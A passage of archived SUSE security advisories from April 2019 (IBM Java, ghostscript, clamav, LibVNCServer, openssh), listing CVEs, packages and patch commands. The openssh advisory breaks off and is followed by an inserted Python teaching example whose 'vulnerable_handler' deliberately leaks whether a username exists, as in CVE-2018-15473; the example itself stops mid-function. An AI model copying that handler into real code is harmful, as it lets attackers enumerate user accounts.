     - IJ09600 DTFJ AND JDMPVIEW FAIL TO PARSE WIDE REGISTER VALUES
   * Security
     - IJ10492 'EC KEYSIZE < 384' IS NOT HONORED USING THE
       'JDK.TLS.DISABLEDALGORITHMS' SECURITY PROPERTY
     - IJ10310 ADD NULL CHECKING ON THE ENCRYPTION TYPES LIST TO
       CREDENTIALS.GETDEFAULTNATIVECREDS() METHOD
     - IJ10491 AES/GCM CIPHER - AAD NOT RESET TO UN-INIT STATE AFTER DOFINAL( )
       AND INIT( )
     - IJ08442 HTTP PUBLIC KEY PINNING FINGERPRINT, PROBLEM WITH CONVERTING TO
       JKS KEYSTORE
     - IJ09107 IBMPKCS11IMPL CRYPTO PROVIDER - INTERMITTENT ERROR WITH
       SECP521R1 SIGNATURE ON Z/OS
     - IJ10136 IBMPKCS11IMPL - INTERMITTENT ERROR WITH SECP521R1 SIG ON Z/OS
       AND Z/LINUX
     - IJ08530 IBMPKCS11IMPL PROVIDER USES THE WRONG RSA CIPHER MECHANISM FOR
       THE RSA/ECB/PKCS1PADDING CIPHER
     - IJ08723 JAAS THROWS A 'ARRAY INDEX OUT OF RANGE' EXCEPTION
     - IJ08704 THE SECURITY PROPERTY 'JDK.CERTPATH.DISABLEDALGORITHMS' IS
       MISTAKENLY BEING USED TO FILTER JAR SIGNING ALGORITHMS
   * z/OS Extensions
     - PH03889 ADD SUPPORT FOR TRY-WITH-RESOURCES TO COM.IBM.JZOS.ENQUEUE
     - PH03414 ROLLOVER FROM SYE TO SAE FOR ICSF REASON CODE 3059
     - PH04008 ZERTJSSE - Z SYSTEMS ENCRYPTION READINESS TOOL (ZERT) NEW
       SUPPORT IN THE Z/OS JAVA SDK

   This includes the update to Java 8.0 Service Refresh 5 Fix Pack 22:

   * Java Virtual Machine
     - IJ09139 CUDA4J NOT AVAILABLE ON ALL PLATFORMS
   * JIT Compiler
     - IJ09089 CRASH DURING COMPILATION IN USEREGISTER ON X86-32
     - IJ08655 FLOATING POINT ERROR (SIGFPE) IN ZJ9SYM1 OR ANY VM/JIT MODULE ON
       AN INSTRUCTION FOLLOWING A VECTOR INSTRUCTION
     - IJ08850 CRASH IN ARRAYLIST$ITR.NEXT()
     - IJ09601 JVM CRASHES ON A SIGBUS SIGNAL WHEN ACCESSING A DIRECTBYTEBUFFER
   * z/OS Extensions
     - PH02999 JZOS data management classes accept dataset names in code pages
       supported by z/OS system services
     - PH01244 OUTPUT BUFFER TOO SHORT FOR GCM MODE ENCRYPTION USING
       IBMJCEHYBRID

   Also the update to Java 8.0 Service Refresh 5 Fix Pack 21:

   * Class Libraries
     - IJ08569 JAVA.IO.IOEXCEPTION OCCURS WHEN A FILECHANNEL IS BIGGER THAN 2GB
       ON AIX PLATFORM
     - IJ08570 JAVA.LANG.UNSATISFIEDLINKERROR WITH JAVA OPTION
       -DSUN.JAVA2D.CMM=SUN.JAVA2D.CMM.KCMS.KCMSSERVICEPROVIDER ON AIX PLATFORM
   * Java Virtual Machine
     - IJ08001 30% THROUGHPUT DROP FOR CERTAIN SYNCHRONIZATION WORKLOADS
     - IJ07997 TRACEASSERT IN GARBAGE COLLECTOR(MEMORYSUBSPACE)
   * JIT Compiler
     - IJ08503 ASSERTION IS HIT DUE TO UNEXPECTED STACK HEIGHT IN DEBUGGING MODE
     - IJ08375 CRASH DURING HARDWARE GENERATED GUARDED STORAGE EVENT WITHIN A
       TRANSACTIONAL EXECUTION REGION WHEN RUNNING WITH -XGC:CONCURRENTS
     - IJ08205 CRASH WHILE COMPILING
     - IJ09575 INCORRECT RESULT WHEN USING JAVA.LANG.MATH.MIN OR MAX ON 31-BIT
       JVM
     - IJ07886 INCORRECT CALCULATIONS WHEN USING NUMBERFORMAT.FORMAT() AND
       BIGDECIMAL.{FLOAT/DOUBLE}VALUE()

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1072=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   java-1_8_0-ibm-1.8.0_sr5.25-30.39.1
   java-1_8_0-ibm-alsa-1.8.0_sr5.25-30.39.1
   java-1_8_0-ibm-devel-1.8.0_sr5.25-30.39.1
   java-1_8_0-ibm-plugin-1.8.0_sr5.25-30.39.1

References:

   https://www.suse.com/security/cve/CVE-2018-13785.html
   https://www.suse.com/security/cve/CVE-2018-3136.html
   https://www.suse.com/security/cve/CVE-2018-3139.html
   https://www.suse.com/security/cve/CVE-2018-3149.html
   https://www.suse.com/security/cve/CVE-2018-3169.html
   https://www.suse.com/security/cve/CVE-2018-3180.html
   https://www.suse.com/security/cve/CVE-2018-3183.html
   https://www.suse.com/security/cve/CVE-2018-3214.html
   https://bugzilla.suse.com/1116574

From sle-security-updates at lists.suse.com Sat Apr 27 16:38:06 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:38:06 +0200 (CEST)
Subject: SUSE-SU-2018:4090-2: important: Security update for ghostscript
Message-ID: <20190427223806.D3C24F3D3@maintenance.suse.de>

SUSE Security Update: Security update for ghostscript
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:4090-2
Rating:             important
References:         #1109105 #1111479 #1111480 #1112229 #1117022 #1117274
                    #1117313 #1117327 #1117331
Cross-References:   CVE-2018-17183 CVE-2018-17961 CVE-2018-18073
                    CVE-2018-18284 CVE-2018-19409 CVE-2018-19475
                    CVE-2018-19476 CVE-2018-19477
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that solves 8 vulnerabilities and has one errata is now available.

Description:

This update for ghostscript to version 9.26 fixes the following issues:

Security issues fixed:

- CVE-2018-19475: Fixed bypass of an intended access restriction in psi/zdevice2.c (bsc#1117327)
- CVE-2018-19476: Fixed bypass of an intended access restriction in psi/zicc.c (bsc#1117313)
- CVE-2018-19477: Fixed bypass of an intended access restriction in psi/zfjbig2.c (bsc#1117274)
- CVE-2018-19409: Check if another device is used correctly in LockSafetyParams (bsc#1117022)
- CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator (bsc#1112229)
- CVE-2018-18073: Fixed leaks through operator in saved execution stacks (bsc#1111480)
- CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly (bsc#1111479)
- CVE-2018-17183: Fixed a potential code injection by specially crafted PostScript files (bsc#1109105)

Version update to 9.26 (bsc#1117331):

- Security issues have been the primary focus
- Minor bug fixes and improvements
- For release summary see: http://www.ghostscript.com/doc/9.26/News.htm

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1076=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      ghostscript-9.26-23.16.1
      ghostscript-debuginfo-9.26-23.16.1
      ghostscript-debugsource-9.26-23.16.1
      ghostscript-x11-9.26-23.16.1
      ghostscript-x11-debuginfo-9.26-23.16.1
      libspectre-debugsource-0.2.7-12.4.1
      libspectre1-0.2.7-12.4.1
      libspectre1-debuginfo-0.2.7-12.4.1

References:

   https://www.suse.com/security/cve/CVE-2018-17183.html
   https://www.suse.com/security/cve/CVE-2018-17961.html
   https://www.suse.com/security/cve/CVE-2018-18073.html
   https://www.suse.com/security/cve/CVE-2018-18284.html
   https://www.suse.com/security/cve/CVE-2018-19409.html
   https://www.suse.com/security/cve/CVE-2018-19475.html
   https://www.suse.com/security/cve/CVE-2018-19476.html
   https://www.suse.com/security/cve/CVE-2018-19477.html
   https://bugzilla.suse.com/1109105
   https://bugzilla.suse.com/1111479
   https://bugzilla.suse.com/1111480
   https://bugzilla.suse.com/1112229
   https://bugzilla.suse.com/1117022
   https://bugzilla.suse.com/1117274
   https://bugzilla.suse.com/1117313
   https://bugzilla.suse.com/1117327
   https://bugzilla.suse.com/1117331

From sle-security-updates at lists.suse.com Sat Apr 27 16:39:45 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:39:45 +0200 (CEST)
Subject: SUSE-SU-2018:3436-2: moderate: Security update for clamav
Message-ID: <20190427223945.1B2FBF3D3@maintenance.suse.de>

SUSE Security Update: Security update for clamav
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3436-2
Rating:             moderate
References:         #1103040 #1104457 #1110723
Cross-References:   CVE-2018-14680 CVE-2018-14681 CVE-2018-14682 CVE-2018-15378
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes four vulnerabilities is now available.

Description:

This update for clamav fixes the following issues:

clamav was updated to version 0.100.2:

- CVE-2018-15378: Vulnerability in ClamAV's MEW unpacking feature that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device (bsc#1110723).
- CVE-2018-14680, CVE-2018-14681, CVE-2018-14682: more fixes for embedded libmspack (bsc#1103040).
- Make freshclam more robust against lagging signature mirrors.
- On-Access "Extra Scanning", an opt-in minor feature of OnAccess scanning on Linux systems, has been disabled due to a known issue with resource cleanup. OnAccessExtraScanning will be re-enabled in a future release when the issue is resolved. In the meantime, users who enabled the feature in clamd.conf will see a warning informing them that the feature is not active. For details, see: https://bugzilla.clamav.net/show_bug.cgi?id=12048
- Restore exit code compatibility of freshclam with versions before 0.100.0 when the virus database is already up to date (bsc#1104457).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1071=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      clamav-0.100.2-33.18.1
      clamav-debuginfo-0.100.2-33.18.1
      clamav-debugsource-0.100.2-33.18.1

References:

   https://www.suse.com/security/cve/CVE-2018-14680.html
   https://www.suse.com/security/cve/CVE-2018-14681.html
   https://www.suse.com/security/cve/CVE-2018-14682.html
   https://www.suse.com/security/cve/CVE-2018-15378.html
   https://bugzilla.suse.com/1103040
   https://bugzilla.suse.com/1104457
   https://bugzilla.suse.com/1110723

From sle-security-updates at lists.suse.com Sat Apr 27 16:40:32 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:40:32 +0200 (CEST)
Subject: SUSE-SU-2018:3933-2: important: Security update for java-1_7_1-ibm
Message-ID: <20190427224032.9370DF3D3@maintenance.suse.de>

SUSE Security Update: Security update for java-1_7_1-ibm
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3933-2
Rating:             important
References:         #1116574
Cross-References:   CVE-2018-13785 CVE-2018-3136 CVE-2018-3139 CVE-2018-3149
                    CVE-2018-3169 CVE-2018-3180 CVE-2018-3214
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes 7 vulnerabilities is now available.

Description:

java-1_7_1-ibm was updated to Java 7.1 Service Refresh 4 Fix Pack 35 (bsc#1116574):

* Consumability
  - IJ10515 AIX JAVA 7.1.3.10 GENERAL PROTECTION FAULT WHEN ATTEMPTING TO USE HEALTH CENTER API
* Class Libraries
  - IJ10934 CVE-2018-13785
  - IJ10935 CVE-2018-3136
  - IJ10895 CVE-2018-3139
  - IJ10932 CVE-2018-3149
  - IJ10894 CVE-2018-3180
  - IJ10933 CVE-2018-3214
  - IJ09315 FLOATING POINT EXCEPTION FROM JAVA.TEXT.DECIMALFORMAT.FORMAT
  - IJ09088 INTRODUCING A NEW PROPERTY FOR TURKEY TIMEZONE FOR PRODUCTS NOT IDENTIFYING TRT
  - IJ08569 JAVA.IO.IOEXCEPTION OCCURS WHEN A FILECHANNEL IS BIGGER THAN 2GB ON AIX PLATFORM
  - IJ10800 REMOVE EXPIRING ROOT CERTIFICATES IN IBM JDK'S CACERTS.
* Java Virtual Machine
  - IJ10931 CVE-2018-3169
  - IV91132 SOME CORE PATTERN SPECIFIERS ARE NOT HANDLED BY THE JVM ON LINUX
* JIT Compiler
  - IJ08205 CRASH WHILE COMPILING
  - IJ07886 INCORRECT CALCULATIONS WHEN USING NUMBERFORMAT.FORMAT() AND BIGDECIMAL.{FLOAT/DOUBLE}VALUE()
* ORB
  - IX90187 CLIENTREQUESTIMPL.REINVOKE FAILS WITH JAVA.LANG.INDEXOUTOFBOUNDSEXCEPTION
* Security
  - IJ10492 'EC KEYSIZE < 384' IS NOT HONORED USING THE 'JDK.TLS.DISABLEDALGORITHMS' SECURITY PROPERTY
  - IJ10491 AES/GCM CIPHER - AAD NOT RESET TO UN-INIT STATE AFTER DOFINAL( ) AND INIT( )
  - IJ08442 HTTP PUBLIC KEY PINNING FINGERPRINT, PROBLEM WITH CONVERTING TO JKS KEYSTORE
  - IJ09107 IBMPKCS11IMPL CRYPTO PROVIDER - INTERMITTENT ERROR WITH SECP521R1 SIGNATURE ON Z/OS
  - IJ10136 IBMPKCS11IMPL - INTERMITTENT ERROR WITH SECP521R1 SIG ON Z/OS AND Z/LINUX
  - IJ08530 IBMPKCS11IMPL PROVIDER USES THE WRONG RSA CIPHER MECHANISM FOR THE RSA/ECB/PKCS1PADDING CIPHER
  - IJ08723 JAAS THROWS A 'ARRAY INDEX OUT OF RANGE' EXCEPTION
  - IJ08704 THE SECURITY PROPERTY 'JDK.CERTPATH.DISABLEDALGORITHMS' IS MISTAKENLY BEING USED TO FILTER JAR SIGNING ALGORITHMS
* z/OS Extensions
  - PH01244 OUTPUT BUFFER TOO SHORT FOR GCM MODE ENCRYPTION USING IBMJCEHYBRID

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1068=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      java-1_7_1-ibm-1.7.1_sr4.35-38.29.1
      java-1_7_1-ibm-alsa-1.7.1_sr4.35-38.29.1
      java-1_7_1-ibm-devel-1.7.1_sr4.35-38.29.1
      java-1_7_1-ibm-jdbc-1.7.1_sr4.35-38.29.1
      java-1_7_1-ibm-plugin-1.7.1_sr4.35-38.29.1

References:

   https://www.suse.com/security/cve/CVE-2018-13785.html
   https://www.suse.com/security/cve/CVE-2018-3136.html
   https://www.suse.com/security/cve/CVE-2018-3139.html
   https://www.suse.com/security/cve/CVE-2018-3149.html
   https://www.suse.com/security/cve/CVE-2018-3169.html
   https://www.suse.com/security/cve/CVE-2018-3180.html
   https://www.suse.com/security/cve/CVE-2018-3214.html
   https://bugzilla.suse.com/1116574

From sle-security-updates at lists.suse.com Sat Apr 27 16:41:07 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:41:07 +0200 (CEST)
Subject: SUSE-SU-2018:2975-3: important: Security update for ghostscript
Message-ID: <20190427224107.3C066F3D3@maintenance.suse.de>

SUSE Security Update: Security update for ghostscript
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:2975-3
Rating:             important
References:         #1106171 #1106172 #1106173 #1106195 #1107410 #1107411
                    #1107412 #1107413 #1107420 #1107421 #1107422 #1107423
                    #1107426 #1107581 #1108027 #1109105
Cross-References:   CVE-2018-15908 CVE-2018-15909 CVE-2018-15910 CVE-2018-15911
                    CVE-2018-16509 CVE-2018-16510 CVE-2018-16511 CVE-2018-16513
                    CVE-2018-16539 CVE-2018-16540 CVE-2018-16541 CVE-2018-16542
                    CVE-2018-16543 CVE-2018-16585 CVE-2018-16802 CVE-2018-17183
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes 16 vulnerabilities is now available.
Description:

This update for ghostscript to version 9.25 fixes the following issues:

These security issues were fixed:

- CVE-2018-17183: Remote attackers were able to supply crafted PostScript to potentially overwrite or replace error handlers to inject code (bsc#1109105).
- CVE-2018-15909: Prevent type confusion using the .shfill operator that could have been used by attackers able to supply crafted PostScript files to crash the interpreter or potentially execute code (bsc#1106172).
- CVE-2018-15908: Prevent attackers that are able to supply malicious PostScript files from bypassing .tempfile restrictions and writing files (bsc#1106171).
- CVE-2018-15910: Prevent a type confusion in the LockDistillerParams parameter that could have been used to crash the interpreter or execute code (bsc#1106173).
- CVE-2018-15911: Prevent an uninitialized memory access in the aesdecode operator that could have been used to crash the interpreter or potentially execute code (bsc#1106195).
- CVE-2018-16513: Prevent a type confusion in the setcolor function that could have been used to crash the interpreter or possibly have unspecified other impact (bsc#1107412).
- CVE-2018-16509: Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could have been used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction (bsc#1107410).
- CVE-2018-16510: Incorrect exec stack handling in the "CS" and "SC" PDF primitives could have been used by remote attackers able to supply crafted PDFs to crash the interpreter or possibly have unspecified other impact (bsc#1107411).
- CVE-2018-16542: Prevent attackers able to supply crafted PostScript files from using insufficient interpreter stack-size checking during error handling to crash the interpreter (bsc#1107413).
- CVE-2018-16541: Prevent attackers able to supply crafted PostScript files from using incorrect free logic in pagedevice replacement to crash the interpreter (bsc#1107421).
- CVE-2018-16540: Prevent use-after-free in copydevice handling that could have been used to crash the interpreter or possibly have unspecified other impact (bsc#1107420).
- CVE-2018-16539: Prevent attackers able to supply crafted PostScript files from using incorrect access checking in temp file handling to disclose contents of files on the system otherwise not readable (bsc#1107422).
- CVE-2018-16543: gssetresolution and gsgetresolution allowed attackers to have an unspecified impact (bsc#1107423).
- CVE-2018-16511: A type confusion in "ztype" could have been used by remote attackers able to supply crafted PostScript to crash the interpreter or possibly have unspecified other impact (bsc#1107426).
- CVE-2018-16585: The .setdistillerkeys PostScript command was accepted even though it is not intended for use during document processing (e.g., after the startup phase). This led to memory corruption, allowing remote attackers able to supply crafted PostScript to crash the interpreter or possibly have unspecified other impact (bsc#1107581).
- CVE-2018-16802: Incorrect "restoration of privilege" checking when running out of stack during exception handling could have been used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction. This is due to an incomplete fix for CVE-2018-16509 (bsc#1108027).

These non-security issues were fixed:

* Fixes problems with argument handling, some unintended results of the security fixes to the SAFER file access restrictions (specifically accessing ICC profile files).
* Avoid that ps2epsi fails with 'Error: /undefined in --setpagedevice--'

For additional changes please check http://www.ghostscript.com/doc/9.25/News.htm and the changes file of the package.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1074=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      ghostscript-9.25-23.13.1
      ghostscript-debuginfo-9.25-23.13.1
      ghostscript-debugsource-9.25-23.13.1
      ghostscript-x11-9.25-23.13.1
      ghostscript-x11-debuginfo-9.25-23.13.1

References:

   https://www.suse.com/security/cve/CVE-2018-15908.html
   https://www.suse.com/security/cve/CVE-2018-15909.html
   https://www.suse.com/security/cve/CVE-2018-15910.html
   https://www.suse.com/security/cve/CVE-2018-15911.html
   https://www.suse.com/security/cve/CVE-2018-16509.html
   https://www.suse.com/security/cve/CVE-2018-16510.html
   https://www.suse.com/security/cve/CVE-2018-16511.html
   https://www.suse.com/security/cve/CVE-2018-16513.html
   https://www.suse.com/security/cve/CVE-2018-16539.html
   https://www.suse.com/security/cve/CVE-2018-16540.html
   https://www.suse.com/security/cve/CVE-2018-16541.html
   https://www.suse.com/security/cve/CVE-2018-16542.html
   https://www.suse.com/security/cve/CVE-2018-16543.html
   https://www.suse.com/security/cve/CVE-2018-16585.html
   https://www.suse.com/security/cve/CVE-2018-16802.html
   https://www.suse.com/security/cve/CVE-2018-17183.html
   https://bugzilla.suse.com/1106171
   https://bugzilla.suse.com/1106172
   https://bugzilla.suse.com/1106173
   https://bugzilla.suse.com/1106195
   https://bugzilla.suse.com/1107410
   https://bugzilla.suse.com/1107411
   https://bugzilla.suse.com/1107412
   https://bugzilla.suse.com/1107413
   https://bugzilla.suse.com/1107420
   https://bugzilla.suse.com/1107421
   https://bugzilla.suse.com/1107422
   https://bugzilla.suse.com/1107423
   https://bugzilla.suse.com/1107426
   https://bugzilla.suse.com/1107581
   https://bugzilla.suse.com/1108027
   https://bugzilla.suse.com/1109105

From sle-security-updates at lists.suse.com Mon Apr 29 04:11:57 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 29 Apr 2019 12:11:57 +0200 (CEST)
Subject: SUSE-SU-2019:0313-2: critical: Security update for LibVNCServer
Message-ID: <20190429101157.48657F3D3@maintenance.suse.de>

SUSE Security Update: Security update for LibVNCServer
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0313-2
Rating:             critical
References:         #1123823 #1123828 #1123832
Cross-References:   CVE-2018-20748 CVE-2018-20749 CVE-2018-20750
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes three vulnerabilities is now available.

Description:

This update for LibVNCServer fixes the following issues:

Security issues fixed:

- CVE-2018-20749: Fixed a heap out-of-bounds write vulnerability in rfbserver.c (bsc#1123828)
- CVE-2018-20750: Fixed a heap out-of-bounds write vulnerability in rfbserver.c (bsc#1123832)
- CVE-2018-20748: Fixed multiple heap out-of-bounds writes in VNC client code (bsc#1123823)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-313=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      LibVNCServer-debugsource-0.9.9-17.11.1
      libvncclient0-0.9.9-17.11.1
      libvncclient0-debuginfo-0.9.9-17.11.1
      libvncserver0-0.9.9-17.11.1
      libvncserver0-debuginfo-0.9.9-17.11.1

References:

   https://www.suse.com/security/cve/CVE-2018-20748.html
   https://www.suse.com/security/cve/CVE-2018-20749.html
   https://www.suse.com/security/cve/CVE-2018-20750.html
   https://bugzilla.suse.com/1123823
   https://bugzilla.suse.com/1123828
   https://bugzilla.suse.com/1123832

From sle-security-updates at lists.suse.com Mon Apr 29 04:15:39 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 29 Apr 2019 12:15:39 +0200 (CEST)
Subject: SUSE-SU-2019:0060-2: important: Security update for LibVNCServer
Message-ID: <20190429101539.36816F3D3@maintenance.suse.de>

SUSE Security Update: Security update for LibVNCServer
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0060-2
Rating:             important
References:         #1120114 #1120115 #1120116 #1120117 #1120118 #1120119
                    #1120120 #1120121 #1120122
Cross-References:   CVE-2018-15126 CVE-2018-15127 CVE-2018-20019 CVE-2018-20020
                    CVE-2018-20021 CVE-2018-20022 CVE-2018-20023 CVE-2018-20024
                    CVE-2018-6307
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes 9 vulnerabilities is now available.

Description:

This update for LibVNCServer fixes the following issues:

Security issues fixed:

- CVE-2018-15126: Fixed use-after-free in file transfer extension (bsc#1120114)
- CVE-2018-6307: Fixed use-after-free in file transfer extension server code (bsc#1120115)
- CVE-2018-20020: Fixed heap out-of-bounds write inside structure in VNC client code (bsc#1120116)
- CVE-2018-15127: Fixed heap out-of-bounds write in rfbserver.c (bsc#1120117)
- CVE-2018-20019: Fixed multiple heap out-of-bounds writes in VNC client code (bsc#1120118)
- CVE-2018-20023: Fixed information disclosure through improper initialization in VNC Repeater client code (bsc#1120119)
- CVE-2018-20022: Fixed information disclosure through improper initialization in VNC client code (bsc#1120120)
- CVE-2018-20024: Fixed NULL pointer dereference in VNC client code (bsc#1120121)
- CVE-2018-20021: Fixed infinite loop in VNC client code (bsc#1120122)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-60=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      LibVNCServer-debugsource-0.9.9-17.8.1
      libvncclient0-0.9.9-17.8.1
      libvncclient0-debuginfo-0.9.9-17.8.1
      libvncserver0-0.9.9-17.8.1
      libvncserver0-debuginfo-0.9.9-17.8.1

References:

   https://www.suse.com/security/cve/CVE-2018-15126.html
   https://www.suse.com/security/cve/CVE-2018-15127.html
   https://www.suse.com/security/cve/CVE-2018-20019.html
   https://www.suse.com/security/cve/CVE-2018-20020.html
   https://www.suse.com/security/cve/CVE-2018-20021.html
   https://www.suse.com/security/cve/CVE-2018-20022.html
   https://www.suse.com/security/cve/CVE-2018-20023.html
   https://www.suse.com/security/cve/CVE-2018-20024.html
   https://www.suse.com/security/cve/CVE-2018-6307.html
   https://bugzilla.suse.com/1120114
   https://bugzilla.suse.com/1120115
   https://bugzilla.suse.com/1120116
   https://bugzilla.suse.com/1120117
   https://bugzilla.suse.com/1120118
   https://bugzilla.suse.com/1120119
   https://bugzilla.suse.com/1120120
   https://bugzilla.suse.com/1120121
   https://bugzilla.suse.com/1120122

From sle-security-updates at lists.suse.com Mon Apr 29 04:17:15 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 29 Apr 2019 12:17:15 +0200 (CEST)
Subject: SUSE-SU-2018:3776-2: moderate: Security update for openssh
Message-ID: <20190429101715.B70C7F3D3@maintenance.suse.de>

SUSE Security Update: Security update for openssh
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3776-2
Rating:             moderate
References:         #1091396 #1105010 #1106163 #964336 #982273
Cross-References:   CVE-2018-15473 CVE-2018-15919
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that solves two vulnerabilities and has three fixes is now available.

Description:

This update for openssh fixes the following issues:

The following security issues have been fixed:

- CVE-2018-15919: Remotely observable behaviour in auth-gss2.c in OpenSSH could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. OpenSSH developers do not want to treat such a username enumeration (or "oracle") as a vulnerability. (bsc#1106163)
- CVE-2018-15473: OpenSSH was prone to a user existence oracle vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. (bsc#1105010)

Also the following security related hardening change was done:

- Remove arcfour, cast, blowfish from the list of default ciphers. (bsc#982273)

And the following non-security issues were fixed:

- Stop leaking file descriptors (bsc#964336)
- sftp-client.c returns wrong error code upon failure (bsc#1091396)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
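The CVE-2018-15473 entry above describes the defect as bailing out for an invalid user before the request packet has been fully parsed. The following is an added illustration of that principle, not OpenSSH code and not part of the advisory: a toy userauth handler in a made-up SSH-style wire format (length-prefixed strings), with a constructed user/key table. The vulnerable variant consults the user database first and so answers a malformed packet differently for a known and an unknown user; the hardened variant parses and validates the whole packet before anything depends on the username, so the observable response is the same for both. The regression check at the end is the kind of test that catches this class of oracle.

```python
# Added example (not OpenSSH code): a toy SSH-style userauth handler showing why
# the CVE-2018-15473 fix parses the whole request before any user-dependent
# decision. Wire format, user table and keys below are constructed for this example.
import struct
from typing import Callable, Optional, Tuple

# Constructed sample user/key database (assumption for this example).
USER_KEYS = {"alice": b"alice-key", "bob": b"bob-key"}


class MalformedPacket(Exception):
    """The request could not be parsed; a real server disconnects here."""


def _read_string(packet: bytes, off: int) -> Tuple[bytes, int]:
    """Read one SSH-style string: uint32 big-endian length followed by bytes."""
    if off + 4 > len(packet):
        raise MalformedPacket("truncated length field")
    (length,) = struct.unpack(">I", packet[off:off + 4])
    off += 4
    if off + length > len(packet):
        raise MalformedPacket("truncated string body")
    return packet[off:off + length], off + length


def _parse_request(packet: bytes) -> Tuple[str, str, str, bytes]:
    """Parse username, service, method and a method-specific key blob, strictly."""
    user, off = _read_string(packet, 0)
    service, off = _read_string(packet, off)
    method, off = _read_string(packet, off)
    key, off = _read_string(packet, off)
    if off != len(packet):
        raise MalformedPacket("trailing bytes after request")
    try:
        return user.decode(), service.decode(), method.decode(), key
    except UnicodeDecodeError as exc:
        raise MalformedPacket("non-UTF-8 field") from exc


def build_request(user: str, key: bytes = b"", service: str = "ssh-connection",
                  method: str = "publickey") -> bytes:
    """Encode a request in the same toy wire format (used to construct inputs)."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    return s(user.encode()) + s(service.encode()) + s(method.encode()) + s(key)


def vulnerable_handler(packet: bytes) -> str:
    """Bails out for an unknown user BEFORE the packet is fully parsed."""
    user, _ = _read_string(packet, 0)
    if user.decode("utf-8", "replace") not in USER_KEYS:
        return "failure"                  # early exit: the rest is never parsed
    user_s, _svc, _meth, key = _parse_request(packet)   # may raise -> disconnect
    return "success" if USER_KEYS[user_s] == key else "failure"


def hardened_handler(packet: bytes) -> str:
    """Parses and validates the whole packet before consulting the user database."""
    user_s, _svc, _meth, key = _parse_request(packet)   # raises for any user alike
    return "success" if USER_KEYS.get(user_s) == key else "failure"


def observe(handler: Callable[[bytes], str], packet: bytes) -> str:
    """What a client sees: the response, or the disconnect caused by a parse error."""
    try:
        return handler(packet)
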